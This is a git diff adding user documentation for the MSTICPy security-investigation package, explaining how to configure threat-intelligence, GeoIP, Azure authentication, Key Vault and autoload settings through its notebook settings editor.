+    mpedit = MpConfigEdit(settings=mpconfig)
+    mpedit
+
+
+.. figure:: _static/settings_mp_config_edit_azsent.png
+   :alt: Imported settings from config.json
+
+
+Setting the path to your msticpyconfig.yaml
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This is a good point to set up an environment variable so that you can
+keep a single configuration file in a known location and always load the
+same settings. Of course, you’re free to use multiple configs if you
+need to use different settings for each notebook folder. If you don't
+set the MSTICPYCONFIG variable **MSTICPy** will try to load a
+``msticpyconfig.yaml`` from the current directory.
+
+-  decide on a location for your ``msticpyconfig.yaml``
+   This could be in ``~/.msticpyconfig.yaml`` or ``%userprofile%/msticpyconfig.yaml``
+-  copy the ``msticpyconfig.yaml`` file that you just created to this location.
+-  set the ``MSTICPYCONFIG`` environment variable to point to that location
+
+On Windows
+^^^^^^^^^^
+
+.. figure:: _static/settings_win_env_var.png
+   :alt: Setting an environment variable in Windows
+
+On Linux/Mac
+^^^^^^^^^^^^
+
+In your .bashrc (or somewhere else convenient) add:
+
+.. code:: bash
+
+    export MSTICPYCONFIG=~/.msticpyconfig.yaml
+
+
+Test auto-loading your msticpyconfig.yaml
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+-  In the cell below replace the ``./msticpyconfig2.yaml`` with the
+   filename from the previous step
+-  Run the cell (Ctrl-Enter or Shift-Enter)
+
+You should see the settings editor loaded with the settings you created
+earlier
+
+.. note:: The environment variable set in the cell below is not persistent. To make
+   this persistent you need to add it to a startup file like .bashrc or
+   your Windows registry as described above.
+
+.. code:: ipython3
+
+    %env MSTICPYCONFIG=./msticpyconfig2.yaml
+    mpedit = MpConfigEdit()
+    mpedit
+
+
+You should see your saved settings displayed.
+
+
+More Settings
+-------------
+
+Adding Threat Intelligence (TI) Providers
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You will likely want to do lookups of IP Addresses, URLs and other items
+to check for any Threat Intelligence reports. To do that you need to add
+the providers that you want to use. Most TI providers require that you
+have an account with them and supply an API key or other authentication
+items when you connect.
+
+Most providers have a free use tier (or in cases like AlienVault OTX)
+are entirely free. Free tiers for paid providers usually impose a
+certain number of requests that you can make in a given time period.
+
+For account creation, each provider does this slightly differently. Use
+the help links in the editor help to find where to go set each of these
+up.
+
+Assuming that you have done this, we can configure a provider. Be sure
+to store any authentication keys somewhere safe (and memorable).
+
+We are going to use `VirusTotal <https://www.virustotal.com>`__ (VT) as
+an example TI Provider. For this you will need a VirusTotal API key from
+the
+`VirusTotal <https://developers.virustotal.com/v3.0/reference#getting-started>`__
+website. We also support a range of other threat intelligence providers
+- you can read about this here `MSTICPy
+TIProviders <https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html>`__
+
+Taking VirusTotal as our example.
+
+- Click on the **TI Providers** tab
+- Select "VirusTotal" from the **New prov** drop-down list
+- Click **Add**
+
+This should show you the values that you need to provide:
+
+- a single item **AuthKey** (this is usually referred to as an “API Key”)
+
+You can paste the key into the **Value** field and click the **Save**
+button. Do not surround the value with quotes.
+
+Instead of keeping your key in the configuration file,
+you can opt to store the VT AuthKey as an environment variable. This is
+a bit more secure than having it laying around in configuration files.
+Assuming that you have set you VT key as an environment variable
+
+.. code:: bash
+
+   set VT_KEY=VGhpcyBzaG91bGQgc2hvdyB5b3UgdGhlIHZhbHVlcyB  (Windows)
+   export VT_KEY=VGhpcyBzaG91bGQgc2hvdyB5b3UgdGhlIHZhbHVlcyB  (Linux/Mac)
+
+Flip the **Storage** radio button to **EnvironmentVar** and type the
+name of the variable (``VT_KEY`` in our example) into the value box.
+
+You can also use Azure Key Vault to store secrets like these but we will
+need to set up the Key Vault settings before this will work. This
+is covered later in `Key Vault Secrets`_ and `Key Vault`_.
+
+Click the **Save File** button to save your changes.
+
+
+.. figure:: _static/settings_ti_provs.png
+   :alt: Threat intelligence provider settings for VirusTotal
+
+
+Test that the TI settings work
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This assumes that you have set an environment variable pointed at your
+``msticpyconfig.yaml`` or have this file in your current directory.
+Use the MpConfigFile tool to force *MSTICPy* to reload settings from the disk,
+then run a simple lookup.
+
+.. code:: ipython3
+
+    mpconfig.refresh_mp_config()
+
+    # import the TI module
+    from msticpy.sectools import TILookup
+    result = TILookup().lookup_ioc('ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa')
+    TILookup.result_to_df(result)
+
+
+=============  ===========  ==============  ==========  ========  ==========  ====================================================== =========================  ===============================================  ========
+Ioc            IocType      QuerySubtype    Provider    Result    Severity    Details                                                RawResult                  Reference                                          Status
+=============  ===========  ==============  ==========  ========  ==========  ====================================================== =========================  ===============================================  ========
+ed01ebfbc9...  sha256_hash                  VirusTotal  True      high        {'verbose_msg': 'Scan finished, information embedde... {'scans': {'Bkav': {'d...  https://www.virustotal.com/vtapi/v2/file/report         0
+=============  ===========  ==============  ==========  ========  ==========  ====================================================== =========================  ===============================================  ========
+
+
+Key Vault Secrets
+~~~~~~~~~~~~~~~~~
+
+If you have a secret configured as a text string or set as an environment
+variable, you can use the **Upload to KV** button on the to move it to a
+Vault. You must have Key Vault settings configured before you can do this.
+See `Key Vault`_ later in this document.
+
+*MSTICPy* will generate a default name for the secret based on the path
+of the setting (e.g. "TIProviders-VirusTotal-Args-AuthKey"). If the value
+is successfully uploaded the **Value** field in the settings dialog will
+be deleted and the underlying setting replaced with a ``{ "KeyVault": null }``
+value. *MSTICPy* will use this to indicate that it should generate the path
+automatically when trying to retrieve the key.
+
+If you already have secrets stored in a Key Vault you can enter the secret
+name in the **Value** field. If the secret is not stored in your default
+Vault (the values specified in the `Key Vault`_ section), you can specify a path
+of *VaultName*/*SecretName*. Fetching settings from a Vault in a different
+tenant is not currently supported.
+
+See also the
+:ref:`Specifying secrets as Key Vault secrets <getting_started/msticpyconfig:specifying secrets as key vault secrets>`
+section of the *MSTICPy* Package Configuration document.
+
+Adding GeoIP Providers
+~~~~~~~~~~~~~~~~~~~~~~
+
+*MSTICPy* supports two geo location providers - *Maxmind GeoIPLite* and *IP Stack*.
+The main difference between the two is that Maxmind downloads and uses a
+local database, while IPStack is a purely online solution.
+
+For either you need API keys to either download the free database from
+MaxMind or access the IPStack online lookup
+
+We’ll use IPStack as our example. You can sign up for a free accounts for
+`IPStack <https://ipstack.com>`__ and
+`Maxmind <https://www.maxmind.com/en/geolite2/signup>`__
+where you can obtain an API key. You’ll need
+the API for the following steps.
+
+- Select “GeoIPLite” from the **New Prov**
+- Click **Add**
+- Paste your Maxmind key into the **Value** field
+
+Set the Maxmind data folder: - this defaults to ``~/.msticpy``
+- On Windows this translates to the foldername ``%USERPROFILE%/.msticpy``.
+- On Linux/Mac this translates to the folder ``.msticpy`` in your home folder.
+
+This folder is where the downloaded GeopIP database will be stored -
+although you can choose another folder name and location if you prefer.
+
+.. note:: As with the TI providers, you can opt to store your key as
+   an environment variable or keep it in Key Vault.
+
+
+.. figure:: _static/settings_geo_ip.png
+   :alt: Geo IP provider settings for IPStack
+
+
+Test that the GeoIP settings work
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. code:: ipython3
+
+    mpconfig.refresh_mp_config()
+
+    from msticpy.sectools import IPStackLookup
+    geoip = IPStackLookup()
+    geoip.lookup_ip("52.96.165.18")[1][0]
+
+
+.. raw:: html
+
+    <h3>ipaddress</h3>
+    {&nbsp;'AdditionalData':&nbsp;{},<br>
+    &nbsp;&nbsp;'Address':&nbsp;'52.96.165.18',<br>
+    &nbsp;&nbsp;'Location':&nbsp;{&nbsp;'AdditionalData':&nbsp;{},<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'City':&nbsp;'Quincy',<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryCode':&nbsp;'US',<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryName':&nbsp;'United&nbsp;States',<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Latitude':&nbsp;47.206031799316406,<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Longitude':&nbsp;-119.7993392944336,<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'State':&nbsp;'Washington',<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Type':&nbsp;'geolocation',<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'edges':&nbsp;set()},<br>
+    &nbsp;&nbsp;'ThreatIntelligence':&nbsp;[],<br>
+    &nbsp;&nbsp;'Type':&nbsp;'ipaddress',<br>
+    &nbsp;&nbsp;'edges':&nbsp;set()}
+
+|
+
+This is the equivalent for Maxmind *GeoLite*.
+
+.. code:: ipython3
+
+    mpconfig.refresh_mp_config()
+
+    from msticpy.sectools import GeoLiteLookup
+    geoip = GeoLiteLookup()
+    geoip.lookup_ip("52.96.165.18")[1][0]
+
+
+.. raw:: html
+
+    <h3>ipaddress</h3>{&nbsp;'AdditionalData':&nbsp;{},<br>
+    &nbsp;&nbsp;'Address':&nbsp;'52.96.165.18',<br>
+    &nbsp;&nbsp;'Location':&nbsp;{&nbsp;'AdditionalData':&nbsp;{},<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryCode':&nbsp;'US',<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'CountryName':&nbsp;'United&nbsp;States',<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Latitude':&nbsp;47.6032,<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Longitude':&nbsp;-122.3412,<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'State':&nbsp;'Washington',<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Type':&nbsp;'geolocation',<br>
+    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'edges':&nbsp;set()},<br>
+    &nbsp;&nbsp;'ThreatIntelligence':&nbsp;[],<br>
+    &nbsp;&nbsp;'Type':&nbsp;'ipaddress',<br>
+    &nbsp;&nbsp;'edges':&nbsp;set()}
+
+|
+
+Azure Cloud and Authentication Settings
+---------------------------------------
+
+Azure Cloud Settings
+~~~~~~~~~~~~~~~~~~~~
+
+From version 1.4.0 MSTICPy supports multiple sovereign clouds in addition
+to the Azure global cloud.
+
+The Azure clouds supported are:
+
+- **cn** - China
+- **de** - Germany
+- **usgov** - US Government
+
+Configuring MSTICPy to use one of these clouds will cause the following
+components to use the Authority and API endpoint URLs specific to that cloud.
+
+These components include:
+
+- Azure Sentinel data provider
+- Azure Sentinel API
+- Azure Data (Azure resource API) provider
+- Azure Resource graph provider
+- Azure Key Vault
+
+To set the cloud run the following code in a Jupyter notebook:
+
+.. code:: ipython3
+
+   mpedit = MpConfigEdit()
+   mpedit
+
+.. figure:: _static/settings_azure_cloud.png
+   :alt: Azure cloud and authentication settings.
+
+Select the **Azure** tab and choose the required cloud identifier from
+the list. Click **Save** and then **Save Settings** to update and
+write the changed settings to your configuration file.
+
+
+Default Azure authentication methods
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+In the Azure settings tab you can also specify the default authentication
+methods that you want to use. The available methods are:
+
+- **env** - Use credentials set in environment variables
+- **cli** - Using credentials available in an local AzureCLI logon
+- **msi** - Using the Managed Service Identity (MSI) credentials of the
+  machine you are running the notebook kernel on
+- **interactive** - Interactive browser logon
+
+You can select one or more of these. When attempting to authenticate,
+MSTICPy will try each of the selected methods in turn until one
+succeeds (or they all fail). This uses a mechanism known as a
+*ChainedCredential*. This does give you flexibility and a useful
+fallback, if your preferred authentication method does not work.
+However, it does take additional time to cycle through multiple
+methods. If you know, for example, that you always want to use *interactive*
+browser logon (with device code authorization), select this one
+and leave the others unselected.
+
+.. note:: If you are using a remote Jupyter notebook service such as
+   Azure Machine Learning, the first three methods refer to things
+   running on the Jupyter server (the Azure ML Compute). For example,
+   if you want to use AzureCLI credentials you must run ``az login`` on
+   the compute (you may need to install Azure CLI to do this).
+   Similarly, with MSI credentials, these are the credentials of the
+   Jupyter hub server, not the machine that your browser is running
+   on. For environment variables, these must be set on the
+   Jupyter server.
+
+   MSI authentication is not currently support on AML compute.
+
+Using Azure CLI as your default login method
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Due to its ability to cache credentials, we strongly
+recommend using Azure CLI logon. This allows all MSTICPy
+Azure functions to try to obtain current credentials from Azure
+CLI rather than initiate an interactive authentication.
+This is especially helpful when using multiple Azure components
+or when using multiple notebooks.
+
+If the host running your notebook kernel does not have Azure CLI
+installed you can install it from
+`here <https://docs.microsoft.com/cli/azure/install-azure-cli>`__.
+
+To log in using Azure CLI enter the following:
+
+From a terminal:
+
+.. code:: bash
+
+   az login
+
+From a notebook
+
+.. code:: ipython3
+
+   !az login
+
+
+Optional Settings
+-----------------
+
+Other data providers - Splunk, Azure CLI, LocalData, Mordor
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Azure API and Azure Sentinel API
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+If you have set your preferences for Azure authentication methods
+in the **Azure** tab you do not need to add the **AzureCLI**
+data provider unless you want to explicitly use something other
+that the defaults for Azure and Azure Sentinel APIs. If you are
+happy to use the defaults, you can skip the remainder of this section.
+
+See `Default Azure authentication methods`_ for details about this.
+
+To access Azure APIs (such as the Sentinel APIs or Azure resource APIs)
+you need to be able to use Azure Authentication. The setting is named
+"AzureCLI" for historical reasons - don’t let that confuse you.
+
+We currently support two ways of authenticating:
+
+1. Chained chained authentication (recommended)
+2. With a client app ID and secret
+
+Chained authentication lets you try up to four methods of authentication
+as described in `Default Azure authentication methods`_.
+
+To use chained authentication methods select the methods to want to use
+and leave the clientId/tenantId/clientSecret fields empty.
+
+Splunk
+^^^^^^
+
+The Splunk provider has many options. Typically you need only:
+
+- host (your Splunk server host name)
+- username
+- password (you can opt to store this in an environment variable or
+  Key Vault).
+
+You can also supply some or all of these values at startup)
+
+LocalData
+^^^^^^^^^
+
+This is a data provider that reads from local CSVs or Pickled pandas
+DataFrames.
+
+You can set the default data paths that it looks in for data files. This
+can have multiple values:
+
+- put each on a new line
+- do not add quotes
+- do not escape backslashes (e.g. Windows path 'e:\\myfolder' is fine.)
+
+Mordor
+^^^^^^
+
+.. note:: The Mordor GitHub repo has been renamed to "SecurityDatasets".
+
+The Mordor provider has two options:
+
+- The path to save temporary downloaded files (default is the current directory)
+- Whether to cache files or delete them immediately after download.
+
+
+.. figure:: _static/settings_data_provs.png
+   :alt: Data provider settings showing Azure CLI and Splunk
+
+
+
+Key Vault
+~~~~~~~~~
+
+You only need to configure this if you want to store secrets in Azure Key Vault.
+
+You need to create the Key Vault first - do that at your Azure portal.
+Here is the link for the `global KeyVault management
+portal <https://ms.portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.KeyVault%2Fvaults>`__
+
+.. figure:: _static/settings_kv_portal.png
+   :alt: Key Vault properties in Azure portal
+
+The required settings are all values that you get from the Vault
+properties (albeit a couple of them have different names):
+
+- **VaultName** is show at the top left of the properties screen
+- **TenantId** is shown as *Directory ID*
+- **AzureRegion** is shown as *Location*
+- **Authority** is the cloud for your Azure service.
+
+Only **VaultName**, **TenantId** and **Authority** are required to
+retrieve secrets from the the Vault. The other values are needed if you
+opt to create a vault from MSTICPy. See
+
+.. note:: If you have set values for the Authority in the Azure Settings
+   section (see `Azure Cloud and Authentication Settings`_),
+   you do not need to specify it here. Due to limitations of
+   the configuration editor, you cannot empty an empty value in this
+   tab. If you are using a cloud other than the Azure global cloud, make sure
+   that you either
+
+   - set the **Authority** value to the same value as you have set in the
+     **Azure** settings section
+   - manually delete the KeyVault\\Authority value from your msticpyconfig.yaml
+
+
+For more details see
+:ref:`Specifying secrets as Key Vault secrets <getting_started/msticpyconfig:Specifying secrets as Key Vault secrets>`
+
+The **Use KeyRing** option is checked by default. This lets you cache
+Key Vault credentials in a local KeyRing. Not all platforms support this
+but it is supported on Windows, Mac and most Linux distributions
+(for Linux wll may need KWallet or Freedesktop Secret Service - for
+more details see the
+`Keyring documentation <https://keyring.readthedocs.io/en/latest/index.html>`__.
+
+.. warning:: You should not enable KeyRing if you do not fully trust
+   the host that the notebook is running on. The "host" in this case
+   is the Jupyter hub server, where the notebook kernel is running, not
+   necessarily the machine that your browser is running on. Keyring does
+   its caching on the host where the notebook kernel is running.
+
+   In some cases, you may trust the Jupyter host more than you trust
+   the machine that you are browsing from. Keyring does not transmit
+   any credentials to the browser directly.
+
+Click **Save** and then **Save File** when you are done.
+
+
+.. figure:: _static/settings_kv.png
+   :alt: Azure Key Vault settings
+
+
+Test Key Vault
+^^^^^^^^^^^^^^
+
+See if you can connect and view any secrets. Of course nothing will show
+up if you haven’t entered a secret. Add a test secret to the vault to
+show here.
+
+-  Refresh settings
+-  Try to connect and display secrets
+
+.. warning:: Don’t leave this output in your saved notebook.
+   If there are real secrets in the output, use the notebook
+   **Clear output** before saving the notebook. Also delete cached copies of
+   this notebook. Look in the ``.ipynb_checkpoints`` sub-folder of this
+   folder and delete copies of this notebook (although saving the
+   notebook with cleared output should overwrite the checkpoint copy).
+
+.. code:: ipython3
+
+    mpconfig.refresh_mp_config()
+    mpconfig.show_kv_secrets()
+
+.. figure:: _static/settings_show_kv_secrets.png
+   :alt: Viewing Key Vault Secrets
+
+Autoload Query Providers
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+This section controls which, if any, query providers you want to load
+automatically when you run ``nbinit.init_notebook``.
+
+This can save a lot of time if you are frequently authoring new
+notebooks. It also allows the right providers to be loaded before other
+components that might use them such as:
+
+- Pivot functions
+- Notebooklets
+
+(more about these in the next section)
+
+There are two types of provider support:
+
+- Azure Sentinel - here you specify both the provider name and the
+  workspace name that you want to connect to.
+- Other providers - for other query providers, just specify the name
+  of the provider.
+
+Available Azure Sentinel workspaces (in the Add Item drop-down)
+are taken from the items you
+configured in the **Azure Sentinel** tab. Other providers are taken from
+the list of available provider types in *MSTICPy*.
+
+There are two options for each of these:
+
+- **connect** - if this is True (checked) *MSTICPy* will try to authenticate
+  to the provider backend immediately after loading. This assumes that you’ve configured
+  credentials for the provider in your settings. Note: if this is not set
+  it defaults to True.
+- **alias** - when *MSTICPy* loads a provider it assigns it to a Python variable name.
+  By default this is "qry\_*workspace_name*" for Azure Sentinel providers and
+  "qry\_*provider_name*" for other providers. If you want to use
+  something a bit shorter and easier to type/remember you can add an
+  *alias*. The variable name created will be "qry\_*alias*"
+
+.. note:: If you lose track of which providers have been loaded by
+   this mechanism they are added to the ``current_providers`` attribute
+   of ``msticpy``
+
+
+.. code:: ipython3
+
+    mpedit.set_tab("Autoload QueryProvs")
+    mpedit
+
+
+.. figure:: _static/settings_auto_query_prov.png
+   :alt: Auto-load query provider settings.
+
+
+Autoload Component
+~~~~~~~~~~~~~~~~~~
+
+This section controls which, if other components you want to load
+automatically when you run ``nbinit.init_notebook()``.
+
+This includes:
+
+- TILookup - the Threat Intel provider library
+- GeopIP - the Geo ip provider that you want to use
+- AzureData - the module used to query details about Azure resources
+- AzureSentinelAPI - the module used to query the Azure Sentinel API
+- Notebooklets - loads notebooklets from the `msticnb package <https://msticnb.readthedocs.io/en/latest/>`__
+- Pivot - pivot functions
+
+These are loaded in this order, since the Pivot component needs query
+and other providers loaded in order to find the pivot functions that it
+will attach to entities. For more information see `pivot
+functions <https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html>`__
+
+Some components do not require any parameters (e.g. TILookup and Pivot).
+Others do support or require additional settings:
+
+**GeoIpLookup**
+
+You must type the name of the GeoIP provider that you want to use -
+either “GeoLiteLookup” or “IPStack”
+
+**AzureData** and **AzureSentinelAPI**
+
+- **auth_methods** - override the default settings for AzureCLI and connect
+  using the selected methods
+- **connnect** - set to false to load but not connect
+
+**Notebooklets**
+
+This has a single parameter block **AzureSentinel**. At minimum you
+should specify the workspace name. This needs to be in the following
+format:
+
+.. code::
+
+   workspace:WORKSPACENAME
+
+*WORKSPACENAME* must be one of the workspaces defined in the Azure
+Sentinel tab.
+
+You can also add addition parameters to send to the notebooklets init
+function: Specify these as addition key:value pairs, separated by
+newlines.
+
+.. code::
+
+   workspace:WORKSPACENAME
+   providers=["LocalData","geolitelookup"]
+
+See the `msticnb init documentation
+<https://msticnb.readthedocs.io/en/latest/msticnb.html#msticnb.data_providers.init>`__
+for more details
+
+
+.. figure:: _static/settings_auto_components.png
+   :alt: Auto-load component settings.
+
+
+Using MpConfigFile to check and manage your msticpyconfig.yaml
+--------------------------------------------------------------
+
+You can use MpConfigFile as an interactive control or programmatically.
+
+.. figure:: _static/settings_mp_file_config.png
+   :alt: MpFileConfig user interface.
+
+This tool lets you do the following operations. The function call equivalents
+are listed against each operation:
+
+======================  ======================================  ==========================================
+UI Button               Method call                             Notes
+======================  ======================================  ==========================================
+Load File               ``mpconfig.load_from_file(file_path)``  Load a settings file
+                        ``mpconfig.browse_for_file()``          Launch file browser/search
+Load Default            ``mpconfig.load_default()``             Load your default settings (pointed to by
+                                                                the MSTICPYCONFIG environment variable)
+Save File               ``mpconfig.save_to_file(file_path)``
+View Settings           ``mpconfig.view_settings()``            View the text of the settings file
+Validate Settings       ``mpconfig.validate_settings()``        Validate loaded settings
+Convert to MP           ``mpconfig.map_json_to_mp_ws()``        If you have loaded a ``config.json`` file
+                                                                this will convert it to MSTICPy format
+Show Key Vault Secrets  ``mpconfig.show_kv_secrets()``          View secrets in your Key Vault
+Reload Settings         ``mpconfig.refresh_mp_config()``        reloads the settings for MSTICPy based on
+                                                                the saved default config file (this is
+                                                                either the file pointed to by
+                                                                MSTICPYCONFIG env variable or a file
+                                                                "msticpyconfig.yaml" in the current
+                                                                directory.
+======================  ======================================  ==========================================
+
+If you create ``MpConfigFile()`` with no parameters this will also load the default settings
+
+You can get more help on these methods from the See
+:py:class:`MpConfigFile API documentation <msticpy.config.mp_config_file.MpConfigFile>`
+or by using the Python help function:
+
+.. code:: ipython3
+
+   help(MpConfigFile)
diff --git a/docs/source/getting_started/_static/JupyterAndSecurity-JupyterCell.png b/docs/source/getting_started/_static/JupyterAndSecurity-JupyterCell.png
new file mode 100644
index 000000000..dac273a16
Binary files /dev/null and b/docs/source/getting_started/_static/JupyterAndSecurity-JupyterCell.png differ
diff --git a/docs/source/getting_started/_static/SentinelGettingStarted-KqlAuth.png b/docs/source/getting_started/_static/SentinelGettingStarted-KqlAuth.png
new file mode 100644
index 000000000..ba4f6697d
Binary files /dev/null and b/docs/source/getting_started/_static/SentinelGettingStarted-KqlAuth.png differ
diff --git a/docs/source/getting_started/_static/SentinelGettingStarted.png b/docs/source/getting_started/_static/SentinelGettingStarted.png
new file mode 100644
index 000000000..54033deb2
Binary files /dev/null and b/docs/source/getting_started/_static/SentinelGettingStarted.png differ
diff --git a/docs/source/getting_started/_static/extra_exception.png b/docs/source/getting_started/_static/extra_exception.png
new file mode 100644
index 000000000..d3291d6b3
Binary files /dev/null and b/docs/source/getting_started/_static/extra_exception.png differ
diff --git a/docs/source/getting_started/_static/mp_config_edit_azsent.png b/docs/source/getting_started/_static/mp_config_edit_azsent.png
new file mode 100644
index 000000000..3160bad92
Binary files /dev/null and b/docs/source/getting_started/_static/mp_config_edit_azsent.png differ
diff --git a/docs/source/getting_started/_static/mp_config_file_no_settings.png b/docs/source/getting_started/_static/mp_config_file_no_settings.png
new file mode 100644
index 000000000..d29b59769
Binary files /dev/null and b/docs/source/getting_started/_static/mp_config_file_no_settings.png differ
diff --git a/docs/source/getting_started/_static/mp_config_file_settings.png b/docs/source/getting_started/_static/mp_config_file_settings.png
new file mode 100644
index 000000000..795b84016
Binary files /dev/null and b/docs/source/getting_started/_static/mp_config_file_settings.png differ
diff --git a/docs/source/getting_started/_static/settings_auto_components.png b/docs/source/getting_started/_static/settings_auto_components.png
new file mode 100644
index 000000000..03355bb50
Binary files /dev/null and b/docs/source/getting_started/_static/settings_auto_components.png differ
diff --git a/docs/source/getting_started/_static/settings_auto_query_prov.png b/docs/source/getting_started/_static/settings_auto_query_prov.png
new file mode 100644
index 000000000..ee56f81dd
Binary files /dev/null and b/docs/source/getting_started/_static/settings_auto_query_prov.png differ
diff --git a/docs/source/getting_started/_static/settings_azure_cloud.png b/docs/source/getting_started/_static/settings_azure_cloud.png
new file mode 100644
index 000000000..0a31812f0
Binary files /dev/null and b/docs/source/getting_started/_static/settings_azure_cloud.png differ
diff --git a/docs/source/getting_started/_static/settings_data_provs.png b/docs/source/getting_started/_static/settings_data_provs.png
new file mode 100644
index 000000000..c17aaeb4a
Binary files /dev/null and b/docs/source/getting_started/_static/settings_data_provs.png differ
diff --git a/docs/source/getting_started/_static/settings_geo_ip.png b/docs/source/getting_started/_static/settings_geo_ip.png
new file mode 100644
index 000000000..7f429f664
Binary files /dev/null and b/docs/source/getting_started/_static/settings_geo_ip.png differ
diff --git a/docs/source/getting_started/_static/settings_help.png b/docs/source/getting_started/_static/settings_help.png
new file mode 100644
index 000000000..4bb453e9b
Binary files /dev/null and b/docs/source/getting_started/_static/settings_help.png differ
diff --git a/docs/source/getting_started/_static/settings_kv.png b/docs/source/getting_started/_static/settings_kv.png
new file mode 100644
index 000000000..7cba4481f
Binary files /dev/null and b/docs/source/getting_started/_static/settings_kv.png differ
diff --git a/docs/source/getting_started/_static/settings_kv_portal.png b/docs/source/getting_started/_static/settings_kv_portal.png
new file mode 100644
index 000000000..fed57b139
Binary files /dev/null and b/docs/source/getting_started/_static/settings_kv_portal.png differ
diff --git a/docs/source/getting_started/_static/settings_mp_conf_edit.png b/docs/source/getting_started/_static/settings_mp_conf_edit.png
new file mode 100644
index 000000000..3442f5830
Binary files /dev/null and b/docs/source/getting_started/_static/settings_mp_conf_edit.png differ
diff --git a/docs/source/getting_started/_static/settings_mp_config_edit_azsent.png b/docs/source/getting_started/_static/settings_mp_config_edit_azsent.png
new file mode 100644
index 000000000..76366f7de
Binary files /dev/null and b/docs/source/getting_started/_static/settings_mp_config_edit_azsent.png differ
diff --git a/docs/source/getting_started/_static/settings_mp_file_config.png b/docs/source/getting_started/_static/settings_mp_file_config.png
new file mode 100644
index 000000000..4af90c34e
Binary files /dev/null and b/docs/source/getting_started/_static/settings_mp_file_config.png differ
diff --git a/docs/source/getting_started/_static/settings_mp_file_config_view.png b/docs/source/getting_started/_static/settings_mp_file_config_view.png
new file mode 100644
index 000000000..6ba78e814
Binary files /dev/null and b/docs/source/getting_started/_static/settings_mp_file_config_view.png differ
diff --git a/docs/source/getting_started/_static/settings_show_kv_secrets.png b/docs/source/getting_started/_static/settings_show_kv_secrets.png
new file mode 100644
index 000000000..56e803297
Binary files /dev/null and b/docs/source/getting_started/_static/settings_show_kv_secrets.png differ
diff --git a/docs/source/getting_started/_static/settings_ti_provs.png b/docs/source/getting_started/_static/settings_ti_provs.png
new file mode 100644
index 000000000..c17f37ee3
Binary files /dev/null and b/docs/source/getting_started/_static/settings_ti_provs.png differ
diff --git a/docs/source/getting_started/_static/settings_win_env_var.png b/docs/source/getting_started/_static/settings_win_env_var.png
new file mode 100644
index 000000000..66d18d0a0
Binary files /dev/null and b/docs/source/getting_started/_static/settings_win_env_var.png differ
diff --git a/docs/source/getting_started/msticpyconfig.rst b/docs/source/getting_started/msticpyconfig.rst
new file mode 100644
index 000000000..b74583e9b
--- /dev/null
+++ b/docs/source/getting_started/msticpyconfig.rst
@@ -0,0 +1,675 @@
+
+*MSTICPy* Package Configuration
+===============================
+
+Some elements of *MSTICPy* require configuration parameters. An
